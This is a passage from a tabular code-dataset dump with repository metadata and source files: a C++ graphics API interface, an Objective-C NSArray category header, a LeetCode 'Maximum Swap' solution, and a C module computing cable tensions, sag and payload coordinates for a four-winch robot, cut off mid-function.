hexsha stringlengths 40 40 | size int64 5 1.05M | ext stringclasses 588
values | lang stringclasses 305
values | max_stars_repo_path stringlengths 3 363 | max_stars_repo_name stringlengths 5 118 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count float64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringdate 2015-01-01 00:00:35 2022-03-31 23:43:49 ⌀ | max_stars_repo_stars_event_max_datetime stringdate 2015-01-01 12:37:38 2022-03-31 23:59:52 ⌀ | max_issues_repo_path stringlengths 3 363 | max_issues_repo_name stringlengths 5 118 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count float64 1 134k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 363 | max_forks_repo_name stringlengths 5 135 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count float64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringdate 2015-01-01 00:01:02 2022-03-31 23:27:27 ⌀ | max_forks_repo_forks_event_max_datetime stringdate 2015-01-03 08:55:07 2022-03-31 23:59:24 ⌀ | content stringlengths 5 1.05M | avg_line_length float64 1.13 1.04M | max_line_length int64 1 1.05M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
461ce8bea96a68207e840167836dca787b111071 | 821 | h | C | Engine/Source/Runtime/Graphics/Public/Graphics/GraphicsApi.h | HybridAlpaca/Raptor | d2ccb1f82e70026aa5cbdb9df09c95deb92cf16f | [
"MIT"
] | 1 | 2018-04-23T17:58:58.000Z | 2018-04-23T17:58:58.000Z | Engine/Source/Runtime/Graphics/Public/Graphics/GraphicsApi.h | HybridAlpaca/Raptor | d2ccb1f82e70026aa5cbdb9df09c95deb92cf16f | [
"MIT"
] | null | null | null | Engine/Source/Runtime/Graphics/Public/Graphics/GraphicsApi.h | HybridAlpaca/Raptor | d2ccb1f82e70026aa5cbdb9df09c95deb92cf16f | [
"MIT"
] | null | null | null | #pragma once
#include <Raptor/Required.h>
const int GRAPHICS_API = 1;
/**
*
* @class GraphicsApi
* @author Seth Traman
* @brief Abstract class describig the methods a graphics API is expected to have
*
**/
class GraphicsApi
{
public:
virtual ~GraphicsApi () {}
virtual uint16 CreateShader (cchar vertexCode, cchar fragmentCode) = 0;
virtual void DestroyShader (uint16 shader) = 0;
virtual uint16 CreateVertexArray () = 0;
virtual void DestroyVertexArray (uint16 vertexArray) = 0;
virtual uint16 CreateBuffer (uint16 vertexArray, void * data, uint16 type, uintptr size, uint8 * attribs, uint16 attribCount) = 0;
virtual void DestroyBuffer (uint16 buffer) = 0;
virtual void DrawIndexed (uint16 vertexArray, uint16 shader, uint16 indexCount) = 0;
//
virtual void Clear (float32 color [4]) = 0;
};
| 22.805556 | 131 | 0.729598 |
5f058c94a902644679c284e798f742d4b0a3c399 | 353 | h | C | KIAdditionsDemo/KIAdditionsDemo/KIAdditions/NSArray/NSArray+KIAdditions.h | xinyuly/KIAdditionsDemo | 1be16fe6fdfd2c076f0d7ce0fdb9dc5188de78e7 | [
"MIT"
] | null | null | null | KIAdditionsDemo/KIAdditionsDemo/KIAdditions/NSArray/NSArray+KIAdditions.h | xinyuly/KIAdditionsDemo | 1be16fe6fdfd2c076f0d7ce0fdb9dc5188de78e7 | [
"MIT"
] | null | null | null | KIAdditionsDemo/KIAdditionsDemo/KIAdditions/NSArray/NSArray+KIAdditions.h | xinyuly/KIAdditionsDemo | 1be16fe6fdfd2c076f0d7ce0fdb9dc5188de78e7 | [
"MIT"
] | null | null | null | //
// NSArray+KIAdditions.h
// KIAdditions
//
// Created by apple on 16/3/24.
// Copyright © 2016年 smartwalle. All rights reserved.
//
#import <Foundation/Foundation.h>
@interface NSArray (KIAdditions)
@end
@interface NSObject (Array)
/*判断是否为NSArray*/
- (BOOL)isArray;
/*判断是否为不为空的NSArray*/
- (BOOL)isEmptyArray;
- (BOOL)isNotEmptyArray;
@end | 14.12 | 54 | 0.70255 |
00839be5326d5e0fce1c89a3abb35c0ebac6fefe | 841 | h | C | algorithms/medium/0670. Maximum Swap.h | MultivacX/letcode2020 | f86289f8718237303918a7705ae31625a12b68f6 | [
"MIT"
] | null | null | null | algorithms/medium/0670. Maximum Swap.h | MultivacX/letcode2020 | f86289f8718237303918a7705ae31625a12b68f6 | [
"MIT"
] | null | null | null | algorithms/medium/0670. Maximum Swap.h | MultivacX/letcode2020 | f86289f8718237303918a7705ae31625a12b68f6 | [
"MIT"
] | null | null | null | // 670. Maximum Swap
// https://leetcode.com/problems/maximum-swap/
// Runtime: 0 ms, faster than 100.00% of C++ online submissions for Maximum Swap.
// Memory Usage: 6 MB, less than 52.90% of C++ online submissions for Maximum Swap.
class Solution {
public:
int maximumSwap(int num) {
vector<vector<int>> v(10);
string s(to_string(num));
for (int i = s.length() - 1; i > 0; --i)
v[s[i] - '0'].push_back(i);
for (int i = 0; i < s.length() - 1; ++i) {
int val = s[i] - '0';
for (int j = 9; j > val; --j) {
while (!v[j].empty() && v[j].back() <= i) v[j].pop_back();
if (v[j].empty()) continue;
swap(s[i], s[v[j].front()]);
return stoi(s);
}
}
return stoi(s);
}
}; | 32.346154 | 83 | 0.473246 |
2e1c2c1db4c5168c8464bf437cf061d3a5590433 | 29,268 | c | C | Delfino/DualCore/SmartWinchDualCore/kinematics.c | vlad314/FYP_SmartWinch | fca9c23e89d5ea14bfcd18b6565c0a241d7cf3ab | [
"MIT"
] | null | null | null | Delfino/DualCore/SmartWinchDualCore/kinematics.c | vlad314/FYP_SmartWinch | fca9c23e89d5ea14bfcd18b6565c0a241d7cf3ab | [
"MIT"
] | null | null | null | Delfino/DualCore/SmartWinchDualCore/kinematics.c | vlad314/FYP_SmartWinch | fca9c23e89d5ea14bfcd18b6565c0a241d7cf3ab | [
"MIT"
] | null | null | null | /*
* kinematics.c
*
* Created on: 14 Feb 2018
* Author: [Afdhal Atiff Tan] + [Matthew Danby] h
*/
#include "kinematics.h"
#define pi 3.14159265358979323846
//w is the weight per unit length of the cable in N/m
//Coordinates of the 3 motors B,C and D. A is assumed as the origin to begin
//with then the origin is shifted to ensure no negative Coordinates
//Setup assumes flat ground
struct hv_tension_struct {
float h_ten,v_ten;
};
//struct XYZ_coord_struct {
// int X,Y,Z;
// float uplift;
//};
struct input_lengths {
int ab, cd, ad, ac, bd;
};
//struct length4_struct {
// int lengtha,lengthb,lengthc,lengthd;
// int valid_flag;
//};
struct ten4_struct {
float tena,tenb,tenc,tend;
};
struct matrix3x3 {
float e11,e12,e13,e21,e22,e23,e31,e32,e33;
};
struct matrix3x1 {
float e1,e2,e3;
};
struct matrix3x3 matrix_inv_3x3(struct matrix3x3 input) {
struct matrix3x3 output = input;
//Calculate determinant
float det;
det = input.e11*((input.e22*input.e33)-(input.e23*input.e32));
det = det-(input.e12*((input.e21*input.e33)-(input.e23*input.e31)));
det = det+(input.e13*((input.e21*input.e32)-(input.e22*input.e31)));
det = 1/det;
//Matrix of minors with transpose included and det multiplication
output.e11 = det*((input.e22*input.e33)-(input.e23*input.e32));
output.e21 = det*((input.e21*input.e33)-(input.e23*input.e31));
output.e31 = det*((input.e21*input.e32)-(input.e22*input.e31));
output.e12 = det*((input.e12*input.e33)-(input.e13*input.e32));
output.e22 = det*((input.e11*input.e33)-(input.e13*input.e31));
output.e32 = det*((input.e11*input.e32)-(input.e12*input.e31));
output.e13 = det*((input.e12*input.e23)-(input.e13*input.e22));
output.e23 = det*((input.e11*input.e23)-(input.e13*input.e21));
output.e33 = det*((input.e11*input.e22)-(input.e12*input.e21));
//Matrix of cofactors
output.e12 = output.e12*-1;
output.e21 = output.e21*-1;
output.e23 = output.e23*-1;
output.e32 = output.e32*-1;
return output;
}
int min_val4_loc(float a, float b, float c, float d) {
//Analyses the four values and returns the location of the Minimum
//from the four locations (0 through to 3)
float sel[] = {a, b, c, d};
int min_val = 0;
int i;
for (i=1;i<4;i++) {
if (sel[i]<sel[min_val])
min_val = i;
}
return min_val;
}
struct matrix3x1 matrix_mul_3x3_3x1 (struct matrix3x3 input1, struct matrix3x1 input2) {
struct matrix3x1 output;
output.e1 = ((input1.e11*input2.e1)+(input1.e12*input2.e2)+(input1.e13*input2.e3));
output.e2 = ((input1.e21*input2.e1)+(input1.e22*input2.e2)+(input1.e23*input2.e3));
output.e3 = ((input1.e31*input2.e1)+(input1.e32*input2.e2)+(input1.e33*input2.e3));
return output;
}
int max_val4_loc(float a, float b, float c, float d) {
//Analyses the four values and returns the location of the Minimum
//from the four locations (0 through to 3)
float sel[] = {a, b, c, d};
int max_val = 0;
int i;
for (i=1;i<4;i++) {
if (sel[i]>sel[max_val])
max_val = i;
}
return max_val;
}
float max_val4(float a, float b, float c, float d) {
//Analyses the four values and returns the location of the Minimum
//from the four locations (0 through to 3)
float sel[] = {a, b, c, d};
int max_val = 0;
int i;
for (i=1;i<4;i++) {
if (sel[i]>sel[max_val])
max_val = i;
}
return sel[max_val];
}
float sec(float val) {
return (1/cos(val));
}
float round1dp(float val) {
val = val*10.0f;
val = (val > (floor(val)+0.5f)) ? ceil(val) : floor(val);
val = val/10.0f;
return val;
}
float min_max_diff(float g, float h, float i, float j) {
float min = 1000000;
float max = 0;
float arraytest [] = {g,h,i,j};
int m;
for (m = 0;m<4;m++) {
if (min>arraytest[m]) {
min = arraytest[m];
}
if (max<arraytest[m]) {
max = arraytest[m];
}
}
return (max-min);
}
XYZ_coord_struct length4_to_XYZ(int c1, int c2, int c3,int c4) {
//a,b and c are the cable lengths respectively
//Cable d is neglected is this model as assumes no sag at all
//Distance is the gap between the motors assuming they are...
//at the same vertical height
//Rotation of the field is used to simplify maths
//Field is rotated so that location C becomes the longest cable
//int remove_cable = ((max_val4_loc(c1,c2,c3,c4)+2)%4);
//float array1 [] = {c1,c2,c3,c4};
//float a = array1[(remove_cable)];
//float b = array1[((remove_cable+1)%4)];
//float d = array1[((remove_cable+3))%4];
int a = c1;
int b = c2;
int d = c4;
//Performs operation
int ab;
XYZ_coord_struct coords;
coords.X = (pow((modbus_holding_regs[motdxmm]-modbus_holding_regs[motaxmm]),2)+pow(a,2)-pow(d,2))/(2*(modbus_holding_regs[motdxmm]-modbus_holding_regs[motaxmm]));
ab = sqrt(pow((modbus_holding_regs[motaymm]-modbus_holding_regs[motbymm]),2)+pow((modbus_holding_regs[motaxmm]-modbus_holding_regs[motbxmm]),2));
coords.Y = (pow(ab,2)+pow(a,2)-pow(b,2))/(2*ab);
coords.Z = sqrt(pow(a,2)-pow((coords.X-modbus_holding_regs[motaxmm]),2)-pow((coords.Y-modbus_holding_regs[motaymm]),2));
//Rotates field back to original position
//coords = rotate_about_center(coords.X, coords.Y, coords.Z, distance, remove_cable);
return coords;
}
float ten2hten(float run_l,float h, float ten) {
float ten_min = 0.1;
float ten_max = ten;
float tension_it;
float mid_it;
float ten_it;
int n = 0;
float ten_dif;
float ten_dif2;
float w = ((float) wmm)/1000;
//Begins iterative solve
do {
tension_it = (ten_min+ten_max)/2;
mid_it = w*run_l/(2*tension_it);
ten_it = tension_it*sec(atan(sinh(asinh(w*h/(2*tension_it*sinh(mid_it)))-mid_it)));
//Converts to 1 dp
//ten_it = round1dp(ten_it);
//Checks which limit to keep and which to discard
if (ten>ten_it) {
ten_min = tension_it;
} else {
ten_max = tension_it;
}
n++;
ten_dif = fabs(ten_it-ten);
//Continues until desired accuracy reached
} while(ten_dif>0.1 && n<40);
//printf("\n%d",n);
return tension_it;
}
XYZ_coord_struct tenandsag2coord(float tena,float tenb,float tenc,float tend,int slenain,int slenbin,int slencin,int slendin) {
//Converts the four tensions from the strain gauge and the sagged cable...
//lengths to the coordinates of the payload
float X,Y,Z,L1,L2,L3,L4,D1,D2,D3,D4,tenah,tenbh,tench,tendh,va,vb,vc,vd,ka,kb,kc,kd,t1,t2,t3,t4,r1,r2,r3,r4,dif1,dif2,dif3,dif4,maxans,xoff,yoff,tot,tot2,slena,slenb,slenc,slend;
XYZ_coord_struct output;
int m,n,maxplace;
m = 1;
tot = 100;
float w = ((float) wmm)/1000;
//Converts to metres
slena = ((float) slenain)/1000;
slenb = ((float) slenbin)/1000;
slenc = ((float) slencin)/1000;
slend = ((float) slendin)/1000;
float motax = ((float) modbus_holding_regs[motaxmm])/1000;
float motbx = ((float) modbus_holding_regs[motbxmm])/1000;
float motcx = ((float) modbus_holding_regs[motcxmm])/1000;
float motdx = ((float) modbus_holding_regs[motdxmm])/1000;
float motay = ((float) modbus_holding_regs[motaymm])/1000;
float motby = ((float) modbus_holding_regs[motbymm])/1000;
float motcy = ((float) modbus_holding_regs[motcymm])/1000;
float motdy = ((float) modbus_holding_regs[motdymm])/1000;
//Sets the initial values of x,y and Z
X = (motax+motbx+motcx+motdx)/4;
Y = (motay+motby+motcy+motdy)/4;
Z = 2; //Approximation for now
//Iterates to find XY values. Compares the values to the sagged length...
//and keeps iterating until basically match or max number of attempts...
//reached. Uses taylor series sinh and asinh approximation. XY dominates...
//terms so approximation for Z used. The closest point to the expression...
//being correct will be underneath or above the actual payload position...
//on the z axis. Iterations follow after to calculate the Z coordinate.
while (m<20 && tot>0.01) {
m++;
L1 = sqrt(pow(X-motax,2) + pow(Y,2));
L2 = sqrt(pow(X-motbx,2) + pow(motby-Y,2));
L3 = sqrt(pow(motcx-X,2) + pow(motcy-Y,2));
L4 = sqrt(pow(motdx-X,2) + pow(Y,2));
D1 = sqrt(pow(X-motax,2) + pow(Y,2)+ pow(Z,2));
D2 = sqrt(pow(X-motbx,2) + pow(motby-Y,2)+ pow(Z,2));
D3 = sqrt(pow(motcx-X,2) + pow(motcy-Y,2)+ pow(Z,2));
D4 = sqrt(pow(motdx-X,2) + pow(Y,2)+ pow(Z,2));
t1 = L1/D1;
t2 = L2/D2;
t3 = L3/D3;
t4 = L4/D4;
tenah = ten2hten(L1,Z,tena);
tenbh = ten2hten(L2,Z,tenb);
tench = ten2hten(L3,Z,tenc);
tendh = ten2hten(L4,Z,tend);
r1 = w*L1/(2*tenah); //Horizontal tensions approx equal to total
r2 = w*L2/(2*tenbh);
r3 = w*L3/(2*tench);
r4 = w*L4/(2*tendh);
ka = asinh((w*Z)/(2*tenah*sinh(r1)))-r1;
kb = asinh((w*Z)/(2*tenbh*sinh(r2)))-r2;
kc = asinh((w*Z)/(2*tench*sinh(r3)))-r3;
kd = asinh((w*Z)/(2*tendh*sinh(r4)))-r4;
dif1 = (tenah/w)*(sinh(2*r1+ka)-sinh(ka))-slena;
dif2 = (tenbh/w)*(sinh(2*r2+kb)-sinh(kb))-slenb;
dif3 = (tench/w)*(sinh(2*r3+kc)-sinh(kc))-slenc;
dif4 = (tendh/w)*(sinh(2*r4+kd)-sinh(kd))-slend;
float vals[] = {dif1,dif2,dif3,dif4};
float avers = (dif1,dif2,dif3,dif4)/4;
maxplace = max_val4_loc(fabs(dif1),fabs(dif2),fabs(dif3),fabs(dif4));
if (maxplace == 2 || maxplace == 3) {
xoff = 1;
} else {
xoff = -1;
}
if (maxplace == 1 || maxplace == 2) {
yoff = 1;
} else {
yoff = -1;
}
X = X + (xoff*(vals[(maxplace)]-avers)/3);
Y = Y + (yoff*(vals[(maxplace)]-avers)/3);
tot = fabs(dif1)+fabs(dif2)+fabs(dif3)+fabs(dif4);
}
//XY found, now finds Z
tot2 = 100;
n = 1;
L1 = sqrt(pow(X-motax,2) + pow(Y,2));
L2 = sqrt(pow(X-motbx,2) + pow(motby-Y,2));
L3 = sqrt(pow(motcx-X,2) + pow(motcy-Y,2));
L4 = sqrt(pow(motdx-X,2) + pow(Y,2));
while (n<20 && tot2>0.05) {
n++;
D1 = sqrt(pow(L1,2)+ pow(Z,2));
D2 = sqrt(pow(L2,2)+ pow(Z,2));
D3 = sqrt(pow(L3,2)+ pow(Z,2));
D4 = sqrt(pow(L4,2)+ pow(Z,2));
t1 = L1/D1;
t2 = L2/D2;
t3 = L3/D3;
t4 = L4/D4;
tenah = ten2hten(L1,Z,tena);
tenbh = ten2hten(L2,Z,tenb);
tench = ten2hten(L3,Z,tenc);
tendh = ten2hten(L4,Z,tend);
r1 = w*L1/(2*tenah); //Horizontal tensions approx equal to total
r2 = w*L2/(2*tenbh);
r3 = w*L3/(2*tench);
r4 = w*L4/(2*tendh);
ka = asinh((w*Z)/(2*tenah*sinh(r1)))-r1;
kb = asinh((w*Z)/(2*tenbh*sinh(r2)))-r2;
kc = asinh((w*Z)/(2*tench*sinh(r3)))-r3;
kd = asinh((w*Z)/(2*tendh*sinh(r4)))-r4;
dif1 = (tenah/w)*(sinh(2*r1+ka)-sinh(ka))-slena;
dif2 = (tenbh/w)*(sinh(2*r2+kb)-sinh(kb))-slenb;
dif3 = (tench/w)*(sinh(2*r3+kc)-sinh(kc))-slenc;
dif4 = (tendh/w)*(sinh(2*r4+kd)-sinh(kd))-slend;
tot2 = dif1+dif2+dif3+dif4;
Z = Z - tot2;
}
output.X = (int) (X*1000);
output.Y = (int) (Y*1000);
output.Z = (int) (Z*1000);
//Calculates uplift
va = tenah*(sinh(2*r1+ka));
vb = tenbh*(sinh(2*r2+kb));
vc = tench*(sinh(2*r3+kc));
vd = tendh*(sinh(2*r4+kd));
output.uplift = va+vb+vc+vd;
printf("\nM: ");
printf("%d",m);
printf("\nN: ");
printf("%d",n);
return output;
}
length4_struct XYZ_to_length4(int X, int Y, int Z) {
//Int X,Y and Z are the payload coordinates
length4_struct lengths;
lengths.lengtha = sqrt((pow(X-modbus_holding_regs[motaxmm],2))+(pow(Y,2))+(pow(Z,2)));
lengths.lengthb = sqrt((pow(X-modbus_holding_regs[motbxmm],2))+(pow((modbus_holding_regs[motbymm]-Y),2))+(pow(Z,2)));
lengths.lengthd = sqrt((pow((modbus_holding_regs[motdxmm]-X),2))+(pow(Y,2))+(pow(Z,2)));
lengths.lengthc = sqrt((pow((modbus_holding_regs[motcxmm]-X),2))+(pow((modbus_holding_regs[motcymm]-Y),2))+(pow(Z,2)));
lengths.valid_flag = 1;
return lengths;
}
struct hv_tension_struct angle2tensions(float run_l,float h, float angle) {
//Initial definitions of the minimum, maximum and current values of tensions
struct hv_tension_struct ten_ans;
float ten_min = 0.1;
float ten_max = 10000;
float tension_it, mid_it, theta_it, theta_it_d;
int n = 0;
float w = ((float) wmm)/1000;
//Converts angle to 1dp for comparison
angle = angle*10.0f;
angle = (angle > (floor(angle)+0.5f)) ? ceil(angle) : floor(angle);
angle = angle/10.0f;
//Begins iterative solve
do {
tension_it = (ten_min+ten_max)/2;
mid_it = w*run_l/(2*tension_it);
theta_it = atan(sinh(asinh((w*h)/(2*tension_it*sinh(mid_it)))-mid_it));
//Converts to 1 dp in degrees
theta_it_d = theta_it*180*10/pi;
theta_it_d = (theta_it_d > (floor(theta_it_d)+0.5f)) ? ceil(theta_it_d) : floor(theta_it_d);
theta_it_d = theta_it_d/10.0f;
//Checks which limit to keep and which to discard
if (angle>theta_it_d) {
ten_min = tension_it;
} else {
ten_max = tension_it;
}
n++;
//Continues until desired accuracy reached
} while(theta_it_d!=angle && n<1000);
//printf("%f",theta_it);
ten_ans.h_ten = tension_it;
//Tension from top
float thetav_it = atan(sinh(asinh((w*h)/(2*tension_it*sinh(mid_it)))+mid_it));
ten_ans.v_ten = (tension_it*tan(thetav_it));
return ten_ans;
}
length4_struct coord2ten_sag(int xmm, int ymm, int zmm,float comb_uplift) {
//Takes the slackest cable tension. This is assumed to be the the tension of the cable
//with the longest chord length and therefore controlled by the motor furthest from the payload
float x = ((float) xmm)/1000;
float y = ((float) ymm)/1000;
float z = ((float) zmm)/1000;
float w = ((float) wmm)/1000;
float motax = ((float) modbus_holding_regs[motaxmm])/1000;
float motbx = ((float) modbus_holding_regs[motbxmm])/1000;
float motcx = ((float) modbus_holding_regs[motcxmm])/1000;
float motdx = ((float) modbus_holding_regs[motdxmm])/1000;
float motay = ((float) modbus_holding_regs[motaymm])/1000;
float motby = ((float) modbus_holding_regs[motbymm])/1000;
float motcy = ((float) modbus_holding_regs[motcymm])/1000;
float motdy = ((float) modbus_holding_regs[motdymm])/1000;
length4_struct strght_len = XYZ_to_length4(xmm,ymm,zmm);
float d1 = ((float) strght_len.lengtha)/1000;
float d2 = ((float) strght_len.lengthb)/1000;
float d3 = ((float) strght_len.lengthc)/1000;
float d4 = ((float) strght_len.lengthd)/1000;
//Finds the longest cable and rotates the field so that cable is now in the location of cable c
int remove_cable = ((max_val4_loc(d1,d2,d3,d4)+2)%4);
float array1 [] = {d1,d2,d3,d4};
float a = array1[(remove_cable)];
float b = array1[((remove_cable+1)%4)];
float c = array1[((remove_cable+2)%4)];
float d = array1[((remove_cable+3))%4];
//Sets x and Y coordinates for rotated field
float ax = x-motax;
float bx = x-motbx;
float cx = motcx-x;
float dx = motdx-x;
float ay = y-motay;
float by = motby-y;
float cy = motcy-y;
float dy = y-motdy;
float mab = (motby-motay)/(motbx-motax);
float mbc = (motcy-motby)/(motcx-motbx);
float mcd = (motcy-motdy)/(motcx-motdx);
float cab = motay-(mab*motax);
float cbc = motby-(mbc*motbx);
float ccd = motcy-(mcd*motcx);
float lineab = ((y-cab)/mab);
float linebc = (mbc*x+cbc);
float linecd = ((y-ccd)/mcd);
if (((motby-motay)==0)) {
lineab = modbus_holding_regs[motaxmm];
}
if (((motcy-motby)==0)) {
linebc = motby;
}
if (((motcx-motdx)==0)) {
linecd = motcx;
}
if (x<=lineab || y>=linebc || x>=linecd || z<=0) {
//Invalid result as not in field area
strght_len.valid_flag = 0;
return strght_len;
}
//Flips the coordinates
if ((remove_cable==1 || remove_cable==3)) {
ay = x-motax;
by = x-motbx;
cy = motcx-x;
dy = motdx-x;
ax = y-motay;
bx = motby-y;
cx = motcy-y;
dx = y-motdy;
}
//Coordinates now set so payload in sector A. Although A is now the shortest
//and C the longest, it checks that B and D coordinates match the lengths
//as this depends on the position of the payload within the quadrant
float arrayxswap [] = {ax,bx,cx,dx};
float arrayyswap [] = {ay,by,cy,dy};
//Rotates round payload
ay = arrayyswap[(remove_cable+0)%4];
by = arrayyswap[(remove_cable+1)%4];
cy = arrayyswap[(remove_cable+2)%4];
dy = arrayyswap[(remove_cable+3)%4];
ax = arrayxswap[(remove_cable+0)%4];
bx = arrayxswap[(remove_cable+1)%4];
cx = arrayxswap[(remove_cable+2)%4];
dx = arrayxswap[(remove_cable+3)%4];
//Finds and solves matrix equations to find other tensions. This assumes that the sag is negligible in the
//other cables and the tension in them act along the chord length
float cxy = sqrt(pow(cx,2)+pow(cy,2));
//Starts optimisation process
float min_ang = 0;
float max_ang = atan(z/cxy)*180/pi;
float test_ang;
float Fch,Fcv;
struct matrix3x3 matA = {(ax/a),(bx/b),(-1*dx/d),(ay/a),(-1*by/b),(dy/d),(z/a),(z/b),(z/d)};
struct matrix3x3 matAinv = matrix_inv_3x3(matA);
struct matrix3x1 matB;
struct matrix3x1 ten_array;
float ten_out_min[4];
float ten_out_max[4];
float ten_out_test[4];
float ten_out_op[4];
float min_diff = 0;
float max_diff = 100000;
float test_diff = 0;
float op_diff = 100000;
float op_ang = 0;
//Initial min max values
//Min values
struct hv_tension_struct tension_c = angle2tensions(cxy,z, min_ang);
matB.e1 = (tension_c.h_ten*cx/c);
matB.e2 = (tension_c.h_ten*cy/c);
matB.e3 = (comb_uplift-tension_c.v_ten);
ten_array = matrix_mul_3x3_3x1(matAinv,matB);
ten_out_min[0] = ten_array.e1;
ten_out_min[1] = ten_array.e2;
ten_out_min[2] = sqrt(pow(tension_c.h_ten,2)+pow(tension_c.v_ten,2));
ten_out_min[3] = ten_array.e3;
min_diff = min_max_diff(ten_out_min[0],ten_out_min[1],ten_out_min[2],ten_out_min[3]);
//Max values
tension_c = angle2tensions(cxy,z, (max_ang-0.01));
matB.e1 = (tension_c.h_ten*cx/c);
matB.e2 = (tension_c.h_ten*cy/c);
matB.e3 = (comb_uplift-tension_c.v_ten);
ten_array = matrix_mul_3x3_3x1(matAinv,matB);
ten_out_max[0] = ten_array.e1;
ten_out_max[1] = ten_array.e2;
ten_out_max[2] = sqrt(pow(tension_c.h_ten,2)+pow(tension_c.v_ten,2));
ten_out_max[3] = ten_array.e3;
max_diff = min_max_diff(ten_out_max[0],ten_out_max[1],ten_out_max[2],ten_out_max[3]);
test_ang = min_ang;
int min_cable;
do{
//Number determines steps in analysis
test_ang=test_ang+(max_ang/50);
tension_c = angle2tensions(cxy,z, test_ang);
matB.e1 = (tension_c.h_ten*cx/c);
matB.e2 = (tension_c.h_ten*cy/c);
matB.e3 = (comb_uplift-tension_c.v_ten);
ten_array = matrix_mul_3x3_3x1(matAinv,matB);
ten_out_test[0] = ten_array.e1;
ten_out_test[1] = ten_array.e2;
ten_out_test[2] = sqrt(pow(tension_c.h_ten,2)+pow(tension_c.v_ten,2));
ten_out_test[3] = ten_array.e3;
test_diff = max_val4(ten_out_test[0],ten_out_test[1],ten_out_test[2],ten_out_test[3]);
min_cable = min_val4_loc(ten_out_test[0],ten_out_test[1],ten_out_test[2],ten_out_test[3]);
if ((min_cable==2) && (op_diff>test_diff)) {
op_ang = test_ang;
op_diff = test_diff;
ten_out_op[0] = ten_out_test[0];
ten_out_op[1] = ten_out_test[1];
ten_out_op[2] = ten_out_test[2];
ten_out_op[3] = ten_out_test[3];
// max_diff = test_diff;
//} else {
// min_ang = test_ang;
// min_diff = test_diff;
}
//printf("\n%.2f",test_ang);
//printf(" and %.2f",test_diff);
//As zero degrees, no vertical force from cable at motor end
//Force at platform end is equal to cable weight
//Fch = tension_c.h_ten;
//float k1 = asinh((w*z)/(2*Fch*sinh((w*cxy)/(2*Fch)))-((w*cxy)/(2*Fch)));
//float clength_sagged = (Fch/w)*(sinh((w*cxy/Fch)+k1)-sinh(k1));
//float cweight = clength_sagged*w;
//As angle is zero degrees at cable motor end
//Fcv = tension_c.v_ten;
//Creates matrices to solve as simultaneous equations
//matB = {(Fch*cx/c),(Fch*cy/c),(comb_uplift-Fcv)};
//ten_array = matrix_mul_3x3_3x1(matAinv,matB);
//} while ((max_ang-min_ang)>0.5);
} while ((min_cable==2));
printf("\nSlack cable angle with ground: %.2f",op_ang);
//Optimisation complete so sorts back to original orientation
//float Fc = sqrt(pow(Fch,2)+pow(Fcv,2));
//float ten_out[] = {ten_array.e1,ten_array.e2,Fc,ten_array.e3};
//Finds ascociated Lengths
float tenah,tenbh,tench,tendh,slena,slenb,slenc,slend,r1,r2,r3,r4,ka,kb,kc,kd;
tenah = ten2hten(sqrt((ax*ax)+(ay*ay)),z,ten_out_op[0]);
tenbh = ten2hten(sqrt((bx*bx)+(by*by)),z,ten_out_op[1]);
tench = ten2hten(sqrt((cx*cx)+(cy*cy)),z,ten_out_op[2]);
tendh = ten2hten(sqrt((dx*dx)+(dy*dy)),z,ten_out_op[3]);
r1 = w*sqrt((ax*ax)+(ay*ay))/(2*tenah); //Horizontal tensions approx equal to total
r2 = w*sqrt((bx*bx)+(by*by))/(2*tenbh);
r3 = w*sqrt((cx*cx)+(cy*cy))/(2*tench);
r4 = w*sqrt((dx*dx)+(dy*dy))/(2*tendh);
ka = asinh((w*z)/(2*tenah*sinh(r1)))-r1;
kb = asinh((w*z)/(2*tenbh*sinh(r2)))-r2;
kc = asinh((w*z)/(2*tench*sinh(r3)))-r3;
kd = asinh((w*z)/(2*tendh*sinh(r4)))-r4;
slena = (tenah/w)*(sinh(2*r1+ka)-sinh(ka));
slenb = (tenbh/w)*(sinh(2*r2+kb)-sinh(kb));
slenc = (tench/w)*(sinh(2*r3+kc)-sinh(kc));
slend = (tendh/w)*(sinh(2*r4+kd)-sinh(kd));
float len_out_op[] = {slena,slenb,slenc,slend};
length4_struct len_final = {(int) (len_out_op[(4-remove_cable)%4]*1000),(int)(len_out_op[(5-remove_cable)%4]*1000),(int)(len_out_op[(6-remove_cable)%4]*1000),(int)(len_out_op[(7-remove_cable)%4]*1000),1};
struct ten4_struct ten_final = {ten_out_op[(4-remove_cable)%4],ten_out_op[(5-remove_cable)%4],ten_out_op[(6-remove_cable)%4],ten_out_op[(7-remove_cable)%4]};
//printf("\nTension A: ");
//printf("%.2f",ten_final.tena);
//printf("\nTension B: ");
//printf("%.2f",ten_final.tenb);
//printf("\nTension C: ");
//printf("%.2f",ten_final.tenc);
//printf("\nTension D: ");
//printf("%.2f",ten_final.tend);
if (slena<=0 || slenb<=0 || slenc<=0 || slend<=0) {
len_final.valid_flag = 0;
}
return len_final;
}
void set_motor_coord(int ab, int cd, int ad, int ac, int bd) {
//Inputs distance between motors and returns the coordiates respective to A
//Must go negative
//First assumes motor A at origin and D on x axis
float motbxt,motbyt,motcxt,motcyt,motdxt, cosdab,coscda;
motdxt = ad;
cosdab = ((ad*ad)+(ab*ab)-(bd*bd))/(2*ad*ab);
motbxt = cosdab*ab;
motbyt = sqrt((ab*ab)-(motbxt*motbxt));
coscda = ((cd*cd)+(ad*ad)-(ac*ac))/(2*cd*ad);
motcxt = (-coscda*cd);
motcyt = sqrt((cd*cd)-(motcxt*motcxt));
motcxt = motcxt + ad;
//Shifts motor coordinates from the origin at motor A to prevent
//negatives on any of the coordinates
if (motbxt<0) {
//Shifts all x coords by B x offset
modbus_holding_regs[motaxmm] = (int) fabs(motbxt);
modbus_holding_regs[motbxmm] = 0;
modbus_holding_regs[motcxmm] = (int) motcxt+fabs(motbxt);
modbus_holding_regs[motdxmm] = (int) motdxt+fabs(motbxt);
} else {
modbus_holding_regs[motaxmm] = 0;
modbus_holding_regs[motbxmm] = (int) motbxt;
modbus_holding_regs[motcxmm] = (int) motcxt;
